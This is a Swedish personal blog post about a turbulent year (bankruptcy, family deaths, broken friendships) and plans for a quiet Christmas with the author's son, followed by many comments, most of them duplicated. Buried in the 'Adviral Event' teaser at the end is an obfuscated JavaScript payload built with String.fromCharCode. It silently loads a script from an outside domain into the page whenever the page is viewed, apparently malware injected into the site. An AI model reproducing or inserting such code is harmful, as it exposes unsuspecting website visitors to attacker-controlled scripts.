That’s What the storm is all about!

image imageGodkväll fina! Hoppas att allt är bra med dig…

Vilken dag! Jag är trött, tröttare, tröttast!  Full fart just nu! Jobb dygnet runt. Som PT, under inspelning, förhandling, som skribent, Jag har totalt överbokat mig denna veckan! MEN, själv göra själv ha… Jag kommer nog aldrig att klaga över att ha FÖR mycket att göra…. Fasansfulla tanke, tänk om det vore tvärt om!?! 😉 

Lilleman sover. Han snarkar sött. Tänk att min lilla minikopia verkligen är en liten mini kopia av mig själv. Envis sm en åsna, orädd, nyfiken och översocial! SJUKT tacksam att han är en pojke. För OM han varit en tjej så hade jag låst in honom vid 12 års ålder! 😉 

Samtidigt så sitter jag i soffan med ångest. Inte panikångest, bara vanlig julångest. Jag är glad och nöjd då det är ”min” jul. Men jag känner att jag vill leverera det ”bästa” till Lilleman, minnen han alltid ska komma ihåg. Ge honom en varm, harmoniska och trygg bild av julen… DET är mitt mission! 

Snart är det julafton. Julen är och har alltid varit tuff för mig. Jag har aldrig tillhört någon kärnfamilj, jag har aldrig haft en sund inställning till julen. Jag är känslomässigt ganska fucked up!

Traumatiska barndomsminnen och en massa känslor kring denna högtid. Men jag har lixom en hat/kärlek till den. Kan ju ändå inte låta bli att tycka om den iallfall. Sjunger med i ”fåniga” jullåtar. Förvandlar hemmet till en röd och glittrande tillvaro. (långt ifrån mitt vanliga jag) 

Nu är det ”min” jul i år. Att få ha Ludvig hemma över julen, det är såklart ovärdeligt <3

INGENTING kan slå det! MEN, senaste åren har jag firat med vänner. Byggt upp en falsk trygghet i en tillhörighet som plötsligt försvann.. Jag hade nu tänkt att åka till min mamma och fira jul. För första gången på 16 år. Pratade med mamma tidigare idag (vi har senaste året haft en regelbunden och tät telefon kontakt) MEN, Mamma mår inte så bra just nu, hon har mycket värk och orkar kanske inte med det.

Då tycker jag givetvis att det är bättre att invänta ett tillfälle att ses när hon mår bra, utan tvekan! Så efter mycket grubblande fram och tillbaka så bestämde jag mig för att vi bara ska vara hemma. Lilleman och jag. Själva. Övervägde att ta in på någon herrgård eller ett mysigt Hotell, äta lunch och  julbord där. Bara ligga i sängen, titta på film och äta julgodis. Men, näää… Jag hoppar det och stannar hemma… 

Eget julbord, egna traditioner… myspys hela dagen. Nu ska jag bara föröka att hyra in en tomte, som kan komma någon gång under dagen.. det behöver nödvändigast inte vara just efter Kalle, men en tomte MÅSTE jag hyra in!

(((Så om du bor i Sigtuna området inboka mig om du vet någon som extra knäcker som tomte, jag har hörtå tt många andra i vårt område hyrt in en tomte. men jag hittar inte några kontaktuppgifter. )))imageIbland stormar det. Från både höger och vänster. Detta året har tagit prisernas pris i mental utmaning för mig. Mitt livsverk, kraschade, min dröm, min identitet och allt jag tidigare levt för. En krasch som under försommaren höll på att kosta mig livet…

Följt av hela havet stormar bland vänner som visade sig vara nättroll (så sjukt!) Den goda fen, förvandlades till djävulen själv. Allt blev som en snurrande mardröm.

 Följt av cancer inom familjen, dödsfall inom familjen…. En begravning för min farfar, där jag träffade min mamma för första gången på år. OCH min pappa, samtidigt. Tillsammans. DET kan jag inte ens minnas när det skedde sist. (inget ont som inte har något gott med sig <3 ) 

Andra praktiska prövningar, misstanke om brott, tingsrätten, socialanmälningar, RO, förtal, trakasserier, och annat skit som ställer till det mer än vanligt i vardagen! Glömde nästan bort, fick utreseförbud och nekades att lämna landet t,om på en jobbresa! Skrattretande men sant!

 Men absolut värst, Vänner med stort V, som man litat blindt på vände ryggen till och försvann. När jag behövde dom som allra mest! Utan någon förklaring…. Baserat på rykten utan substans. som dessutom grundar sig i egna misstag.

När det stormar som mest, då ser man verkligen vilka som finns där när det väl gäller..

 Jag skulle kunna fortsätta hur länge som helst…. Men kan bara konstatera att TROTS allt skit jag varit med om sista året, djupa saker, ytliga saker, tunga saker och ganska fåniga saker när man sätter det i perspektiv.

Jag har förlorat närstående som gått bort, jag har förlorat min identitet och mitt livsverk, jag har förlorat vänner. SAMTIDIGT som jag har förlorat GRÄSLIGT mycket pengar och många år av hårt slit!

Vad kan jag påverka av det som hänt. Inte mycket. jag kan inte ändra på det som har varit. jag kan inte få det ogjort eller förändra det som redan hänt… 

MEN jag KAN påverka min framtid, jag kan påverka mina kommande val och stegriktningar.

Jag har den hårda vägen lärt mig sjukt mycket om mig själv. Jag har vuxit enormt! Så precis som på bilden så väjer jag att mitt i stormen, stanna upp och le. Le för allt det goda som det onda har fört med…

Tex självinsikt, målmedvetenhet, genuina vänner.

Jag har lärt mig att visa känslor, att gråta. Jösses! Från att inte kunnat gråta till att fullkomligt öppna syndafloden! Men jag har inte gråtit för att jag är svag.. jag grät och bröt ihop för att jag varit lite för stark FÖR länge….

Men jag samlar alla mina erfarenheter och använder dom till något bra. Till framtiden och till att bygga upp det liv jag vill ha. 

Jag har satt upp nya mål. Ingenting kan stoppa mig, ingenting kommer kunna hindra mig att uppnå just MINA mål. 

image

Jag ler….. och ser med spänning på vad 2017 har att erbjuda! Jag har som motto att aldrig göra om samma misstag mer än en gång!

”en gång är ingen gång, två gånger är två gånger för mycket” 

FullSizeRender

Så med detta talesätt så säger jag Over & out!

Kram och gonatt… Vi hörs imorgon.. / My Martens

83 Komentarer

 1. Blir så glad att höra din styrka och livsglädje.. Livskriser gör oss oftast till bättre människor. De hör livet till men det är ju lite jobbigt när de absolut måste dugga tätt. Ni kommer säkert att få en riktigt fin jul du och din fina lilla kille❤Kram

 2. Det låter som ett riktigt helvetesår! Hoppas verkligen att 2017 blir bättre!
  Får jag fråga vad utreseförbudet handlade om? Vad var det du misstänktes för? Har helt missat det.
  Kram

  • Glöm min fråga! Googlade och såg att det hade med konkursen att göra. Beklagar verkligen och hoppas som sagt på att nästa år blir bättre.
   Kram

 3. Blir så glad att höra din styrka och livsglädje.. Livskriser gör oss oftast till bättre människor. De hör livet till men det är ju lite jobbigt när de absolut måste dugga tätt. Ni kommer säkert att få en riktigt fin jul du och din fina lilla kille❤Kram

 4. Det låter som ett riktigt helvetesår! Hoppas verkligen att 2017 blir bättre!

  Får jag fråga vad utreseförbudet handlade om? Vad var det du misstänktes för? Har helt missat det.

  Kram

  • Glöm min fråga! Googlade och såg att det hade med konkursen att göra. Beklagar verkligen och hoppas som sagt på att nästa år blir bättre.

   Kram

 5. Vad stark du är! Jag blir så inspirerad av dig, när jag läste detta inlägg så fick jag lite känslan ”jag ska fasen klara av min situation också!”. Fick lite kämparglöd. Fina du, tack för detta inlägg! Kram

 6. Vad stark du är! Jag blir så inspirerad av dig, när jag läste detta inlägg så fick jag lite känslan ”jag ska fasen klara av min situation också!”. Fick lite kämparglöd. Fina du, tack för detta inlägg! Kram

  • Dom om några borde ju veta precis hur det fungerar med rykten???
   Dom har ju råkat ut för det själva………
   Detta är inte klokt!
   Kan du inte bara skriva här vad det är som har hänt?

  • Dom om några borde ju veta precis hur det fungerar med rykten???
   Dom har ju råkat ut för det själva………
   Detta är inte klokt!
   Kan du inte bara skriva här vad det är som har hänt?

 7. kära My
  Julen för dig o Lilleman kommer att bli jättebra med att bara vara tillsammans, vilket är viktigast för er båda. Sitta och prata, leka, åka på någon aktivitet. Det blir hans minne av julen 2016. Får du inte tag på tomte, så kan ju faktiskt tomten varit och lämnat paket under sängen tex. Eller göm klapparna på olika ställen o gör en skattkarta.
  Allt som hänt för dig under detta år, gräv ner det, det går aldrig att vrida tillbaka klockan.
  Det är framåt som gäller och du har kommit långt, duktigt av dig!!!
  God jul önskar tant mumman

 8. Usch för vänner som sviker och som bara lyssnar på rykten. Men du klarar dig My, du ser hel och glad ut igen. Efter storm kommer lugn! Och jul är bara en dag, jag jobbar hela julhelgen och lämnar familjen ensam. Vi firar på fredag istället. Kram och god jul.

 9. kära My
  Julen för dig o Lilleman kommer att bli jättebra med att bara vara tillsammans, vilket är viktigast för er båda. Sitta och prata, leka, åka på någon aktivitet. Det blir hans minne av julen 2016. Får du inte tag på tomte, så kan ju faktiskt tomten varit och lämnat paket under sängen tex. Eller göm klapparna på olika ställen o gör en skattkarta.
  Allt som hänt för dig under detta år, gräv ner det, det går aldrig att vrida tillbaka klockan.
  Det är framåt som gäller och du har kommit långt, duktigt av dig!!!
  God jul önskar tant mumman

 10. Usch för vänner som sviker och som bara lyssnar på rykten. Men du klarar dig My, du ser hel och glad ut igen. Efter storm kommer lugn! Och jul är bara en dag, jag jobbar hela julhelgen och lämnar familjen ensam. Vi firar på fredag istället. Kram och god jul.

 11. Jag och min mamma har då jag var barn alltid firat jul själva. Jag har bara lyckliga minnen från vårat jular. Lilleman och du kommer att få det hur bra som helst om bara du släpper dina tankar på att det kanske skulle varit si eller så istället. Är du nöjd så är Lilleman nöjd. Dina dåliga före detta kompisar ska du vara glad att du blev av med. Deras falska fasader utåt sett kunde med tiden smittat av sig på dig. Du lärde dig inget gott av dom om du tänker efter. Detta året har varit ditt kanske värsta år så avsluta det med stolthet i ditt sinne . Du klarade av skitåret och till och med skaffade dig en ny utbildning. Du är så otroligt duktig. Kram.

 12. Hej My
  Men varför kan inte du fixa lite med maten hemma hos din mamma?
  Kanske en liten jullunch.
  Det hade nog lilleman uppskattat.
  God jul.
  Hoppas det blir en fin jul oavsett
  Mvh Bella

 13. Fina du. Du är verkligen en kämpe och en förebild!
  Kan inte ens föreställa mig allt du fått gå igenom detta år (… och tidigare år) och ändå går du ur allt med huvudet högt. Jag finner dig otroligt inspirerande och din kämparglöd smittar av sig till mig. Även om jag önskat att ditt år varit så mycket bättre än det faktiskt varit, så tror jag att du under detta år byggt upp en otroligt bra start för ditt ”nya liv” som i längden kommer att göra dig så mycket lyckligare.
  Önskar dig och lilleman en fantastisk jul och en ännu bättre år 2017.
  Stor kram och ta hand om dig.

 14. Jag och min mamma har då jag var barn alltid firat jul själva. Jag har bara lyckliga minnen från vårat jular. Lilleman och du kommer att få det hur bra som helst om bara du släpper dina tankar på att det kanske skulle varit si eller så istället. Är du nöjd så är Lilleman nöjd. Dina dåliga före detta kompisar ska du vara glad att du blev av med. Deras falska fasader utåt sett kunde med tiden smittat av sig på dig. Du lärde dig inget gott av dom om du tänker efter. Detta året har varit ditt kanske värsta år så avsluta det med stolthet i ditt sinne . Du klarade av skitåret och till och med skaffade dig en ny utbildning. Du är så otroligt duktig. Kram.

 15. Du är fantastisk på alla sätt! Av smällar blir man stark och du har verkligen blivit stark av allt du gått igenom. Att klara något sådant krävs ett starkt psyke och en vilja och tro att ingenting är omöjligt, bara ”lite” jobbigt på vägen! Du är värd det bästa i livet, glöm aldrig det! Önskar dig en riktigt fin jul med din son!

 16. Falska vänner är inga vänner så bry dig inte för du är en tuff tjej som har en underbar son och du kommer att fixa en härlig jul så god jul ? önskar jag er kram ? ? ? ⛄ ⛄

 17. Hej My
  Men varför kan inte du fixa lite med maten hemma hos din mamma?
  Kanske en liten jullunch.
  Det hade nog lilleman uppskattat.
  God jul.
  Hoppas det blir en fin jul oavsett
  Mvh Bella

 18. Fina du. Du är verkligen en kämpe och en förebild!

  Kan inte ens föreställa mig allt du fått gå igenom detta år (… och tidigare år) och ändå går du ur allt med huvudet högt. Jag finner dig otroligt inspirerande och din kämparglöd smittar av sig till mig. Även om jag önskat att ditt år varit så mycket bättre än det faktiskt varit, så tror jag att du under detta år byggt upp en otroligt bra start för ditt ”nya liv” som i längden kommer att göra dig så mycket lyckligare.

  Önskar dig och lilleman en fantastisk jul och en ännu bättre år 2017.

  Stor kram och ta hand om dig.

 19. Du är fantastisk på alla sätt! Av smällar blir man stark och du har verkligen blivit stark av allt du gått igenom. Att klara något sådant krävs ett starkt psyke och en vilja och tro att ingenting är omöjligt, bara ”lite” jobbigt på vägen! Du är värd det bästa i livet, glöm aldrig det! Önskar dig en riktigt fin jul med din son!

 20. Falska vänner är inga vänner så bry dig inte för du är en tuff tjej som har en underbar son och du kommer att fixa en härlig jul så god jul 🎄 önskar jag er kram 🎅 🎅 🎅 ⛄ ⛄

 21. Ja ditt 2016 har verkligen varit turbulent. Skönt att du nu kan vända blad och istället gå stark och segrande ur detta. Skickar dig en stor varm kram. Önskar dig och din son en riktigt mysig Jul.

 22. Det låter som en jättemysig julafton o jag är helt övertygad om att Ludvig kommer att va nöjd ❤️
  Jag tror att det är vårt eget inpräntat att julen ska vi umgås hela tjocka släkten o det ska va så storslaget.
  Hoppas att du kan få tag på nån tomte ?? Kram ❤️

 23. Du är stark My. Du har gått igenom mycket under 2016 och kommer ut i slutet av året som en starkare person än tidigare. Det viktiga är du och lilleman. Allt annat är av underordnad betydelse.
  Som någon tidigare sa så måste inte tomten komma. Han kan ha ställt en julklappssäck vid ytterdörren el någon annastans.
  Ska du hämta hem Tess till jul eller ska hon bo kvar hos sin reservhusse en tid till?

 24. Ja ditt 2016 har verkligen varit turbulent. Skönt att du nu kan vända blad och istället gå stark och segrande ur detta. Skickar dig en stor varm kram. Önskar dig och din son en riktigt mysig Jul.

 25. Det låter som en jättemysig julafton o jag är helt övertygad om att Ludvig kommer att va nöjd ❤️
  Jag tror att det är vårt eget inpräntat att julen ska vi umgås hela tjocka släkten o det ska va så storslaget.
  Hoppas att du kan få tag på nån tomte 🎅🏼 Kram ❤️

 26. Du är stark My. Du har gått igenom mycket under 2016 och kommer ut i slutet av året som en starkare person än tidigare. Det viktiga är du och lilleman. Allt annat är av underordnad betydelse.
  Som någon tidigare sa så måste inte tomten komma. Han kan ha ställt en julklappssäck vid ytterdörren el någon annastans.
  Ska du hämta hem Tess till jul eller ska hon bo kvar hos sin reservhusse en tid till?

 27. Hej My!
  Jag har själv varit utsatt för fula lögner och anklagad för totala felaktigheter. Det gjorde oerhört ont men samtidigt blir man stark när man väl kommit igenom det. Då upptäcker man också vilka som är ens riktiga vänner. De där s.k. vännerna som vänder kappan efter vinden och som försvinner när man som bäst behöver dom är definitivt ingenting att ha och det är bara en fördel att dom försvinner. Att människor beter sig så fult och illa visar bara mer om dom själva än om dig. Jag har kommit igenom allt det jobbiga, jag har huvudet högt och min stolthet kvar. Däremot så är det flera i min omgivning som varken kan hålla huvudet högt eller har någon stolthet kvar, men de gjorde ett val och får stå för det. Jag sover gott om nätterna och har rent samvete och det är värt mycket. Kämpa på och var rädd om dina riktiga vänner.
  God Jul och kram!!!

 28. Den du menar är djävulen själv har inte skrivit ett ont ord om dig i sociala medier. Tycker inte du det är illa att kalla någon för djävulen själv? Du säger att du inte tänker sjunka lika lågt som dina föredetta vänner men i detta blogginlägg är det precis det du gör. Jag fattar att du inte kommer att godkänna denna kommentar och OM du gör det så är det för att komma med ett spydigt svar eller veka helt oförstående. Det är väldigt trist att du inte kan ta att läsarna ifrågasätter eller inte håller med dig du tappar i respekt känner jag.

  • Du anonyma läsare, kliv fram ur mörkret då blir det mera trovärdigt. Jag håller med My , fegis! Har du för lite följare på din blogg?

  • Då har du hängt med dåligt hos 4 bloggtanter.Flera insinuerade inlägg gång på gång under en lång tid.Och två av dessa har även svarat sina läsare vidrigt om My. Så dem kan aldrig neka till det.Självklart har dem raderat,men det finns nått som heter ”skärmdump”

   • Även på instagram svarade JT en läsare,som tyckte hon skrivit ett ELAKT inlägg på sin blogg.”kanske ska berätta vad hon gjort….Nää jag tror jag skiter i det”Som togs bort!!!Och sen ha mage att komentera på en annan blogg.”Det finns ingen utfrysning eller mobbing”Vad som än har hänt mellan dem 4/Mamma???bloggare och My.Så är det vidrigt att utnyttja sin blogg som dem har gjort.Mycket lågt och kallas Näthat.INGEN ska behöva utsättas för det.PUNKT. #skärmdumpatALLTunderheladenhärstoryn

  • Jag tyckte att det var riktigt starkt av My att berätta sanningen en gång för alla.
   Vi är många som hejar och önskar My ett stort fett lycka till❤

  • En av bloggerskorna har ju sagt att hon känner ingen My! Fast dom varit med i samma program… väldigt genomskinligt från flera håll. Dom har redan gjort bort sig själva! God Jul My !

 29. Hej My!
  Jag har själv varit utsatt för fula lögner och anklagad för totala felaktigheter. Det gjorde oerhört ont men samtidigt blir man stark när man väl kommit igenom det. Då upptäcker man också vilka som är ens riktiga vänner. De där s.k. vännerna som vänder kappan efter vinden och som försvinner när man som bäst behöver dom är definitivt ingenting att ha och det är bara en fördel att dom försvinner. Att människor beter sig så fult och illa visar bara mer om dom själva än om dig. Jag har kommit igenom allt det jobbiga, jag har huvudet högt och min stolthet kvar. Däremot så är det flera i min omgivning som varken kan hålla huvudet högt eller har någon stolthet kvar, men de gjorde ett val och får stå för det. Jag sover gott om nätterna och har rent samvete och det är värt mycket. Kämpa på och var rädd om dina riktiga vänner.
  God Jul och kram!!!

 30. Den du menar är djävulen själv har inte skrivit ett ont ord om dig i sociala medier. Tycker inte du det är illa att kalla någon för djävulen själv? Du säger att du inte tänker sjunka lika lågt som dina föredetta vänner men i detta blogginlägg är det precis det du gör. Jag fattar att du inte kommer att godkänna denna kommentar och OM du gör det så är det för att komma med ett spydigt svar eller veka helt oförstående. Det är väldigt trist att du inte kan ta att läsarna ifrågasätter eller inte håller med dig du tappar i respekt känner jag.

  • Du anonyma läsare, kliv fram ur mörkret då blir det mera trovärdigt. Jag håller med My , fegis! Har du för lite följare på din blogg?

  • Då har du hängt med dåligt hos 4 bloggtanter.Flera insinuerade inlägg gång på gång under en lång tid.Och två av dessa har även svarat sina läsare vidrigt om My. Så dem kan aldrig neka till det.Självklart har dem raderat,men det finns nått som heter ”skärmdump”

   • Även på instagram svarade JT en läsare,som tyckte hon skrivit ett ELAKT inlägg på sin blogg.”kanske ska berätta vad hon gjort….Nää jag tror jag skiter i det”Som togs bort!!!Och sen ha mage att komentera på en annan blogg.”Det finns ingen utfrysning eller mobbing”Vad som än har hänt mellan dem 4/Mamma???bloggare och My.Så är det vidrigt att utnyttja sin blogg som dem har gjort.Mycket lågt och kallas Näthat.INGEN ska behöva utsättas för det.PUNKT. #skärmdumpatALLTunderheladenhärstoryn

  • Jag tyckte att det var riktigt starkt av My att berätta sanningen en gång för alla.
   Vi är många som hejar och önskar My ett stort fett lycka till❤

  • En av bloggerskorna har ju sagt att hon känner ingen My! Fast dom varit med i samma program… väldigt genomskinligt från flera håll. Dom har redan gjort bort sig själva! God Jul My !

 31. Hoppas ni får en underbar jul och framtid och att du kan lägga det här bakom dig nu som du själv har skrivit så många gånger, lämna det nu My.

 32. Hej My! Tänk på alla dessa barn som under julhelgen måste befinna sig omgivna med en massa fyllesvin, eller en stor släkt som eg ogillar varandra. Tänk på alla uteliggare eller folk i övrigt som dåligt och som väljer att ta sina liv just i juletid.
  Nu är det inte meningen att jag vill dra ner julstämningen för någon/dig. Vill bara påpeka att julen har blivit överskattad på många vis. Det är inte ” status” att va själv eller som dig med ditt barn. Men det är just vad det är om man relaterar till de jag skrev ovan.
  Tänk vad ” lilleman” har det bra med sin kära mamma på julafton i ett tryggt o varmt hem
  ?..God jul!

 33. Så ledsamt att läsa om vad du varit med om. Uppenbarligen har de som svikit dig betytt väldigt mycket för dig, eftersom du blivit så djupt sårad. Ibland kan vänner såra varandra djupt men förlåta varandra. Finns det ingen möjlighet att ni hittar tillbaka till varandra? Ni kanske kan ta hjälp av en teurapeut som kan vägleda er?

 34. Hoppas ni får en underbar jul och framtid och att du kan lägga det här bakom dig nu som du själv har skrivit så många gånger, lämna det nu My.

 35. Hej My! Tänk på alla dessa barn som under julhelgen måste befinna sig omgivna med en massa fyllesvin, eller en stor släkt som eg ogillar varandra. Tänk på alla uteliggare eller folk i övrigt som dåligt och som väljer att ta sina liv just i juletid.

  Nu är det inte meningen att jag vill dra ner julstämningen för någon/dig. Vill bara påpeka att julen har blivit överskattad på många vis. Det är inte ” status” att va själv eller som dig med ditt barn. Men det är just vad det är om man relaterar till de jag skrev ovan.

  Tänk vad ” lilleman” har det bra med sin kära mamma på julafton i ett tryggt o varmt hem
  💚..God jul!

 36. Så ledsamt att läsa om vad du varit med om. Uppenbarligen har de som svikit dig betytt väldigt mycket för dig, eftersom du blivit så djupt sårad. Ibland kan vänner såra varandra djupt men förlåta varandra. Finns det ingen möjlighet att ni hittar tillbaka till varandra? Ni kanske kan ta hjälp av en teurapeut som kan vägleda er?

 37. Ang. tomten så sök efter Rickard Tehage på Sigtuna anslagstavla. Vet inte om han är fullbokad men det är värt ett försök.
  Lycka till med tomte jakt.
  God Jul?

 38. Ang. tomten så sök efter Rickard Tehage på Sigtuna anslagstavla. Vet inte om han är fullbokad men det är värt ett försök.
  Lycka till med tomte jakt.
  God Jul🎄

 39. Jag hoppas julen blir jättemysig för dig o Lilleman! Jag älskar julen och är lyckligt lottad att varje år omge mig med nära o kära❤ Tänker mycket på att alla har inte det fridfullt o kärleksfullt, det gör ont i hjärtat att det finns barn som inte gå en julklapp, som är rädda o inte får en fin jul. ISen är det den fullständiga misären, katastrofen ja fet finns inte ord för att beskriva de grymheter som händer i Aleppo – vi går inte blunda för det som gör ont…. alla bidrag hjälper dessa människor i nöd. Jag har köpt matpaket jag hoppas hoppas att det kan mätta några små älskade barn spm behöver det allra mest och att det kan ge de något hopp. Julen är verkligen tid för eftertanke, reflektion o h tacksamhet för det liv man har. Kram Bea

 40. Jag hoppas julen blir jättemysig för dig o Lilleman! Jag älskar julen och är lyckligt lottad att varje år omge mig med nära o kära❤ Tänker mycket på att alla har inte det fridfullt o kärleksfullt, det gör ont i hjärtat att det finns barn som inte gå en julklapp, som är rädda o inte får en fin jul. ISen är det den fullständiga misären, katastrofen ja fet finns inte ord för att beskriva de grymheter som händer i Aleppo – vi går inte blunda för det som gör ont…. alla bidrag hjälper dessa människor i nöd. Jag har köpt matpaket jag hoppas hoppas att det kan mätta några små älskade barn spm behöver det allra mest och att det kan ge de något hopp. Julen är verkligen tid för eftertanke, reflektion o h tacksamhet för det liv man har. Kram Bea

 41. Du är så himla stark My!! Stor eloge till dig som pratar om både dina svagheter och styrkor!! Du är en verklig hjälte i mina ögon!! Stor Kram till dig!! ❤️❤️

 42. Du är så himla stark My!! Stor eloge till dig som pratar om både dina svagheter och styrkor!! Du är en verklig hjälte i mina ögon!! Stor Kram till dig!! ❤️❤️

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/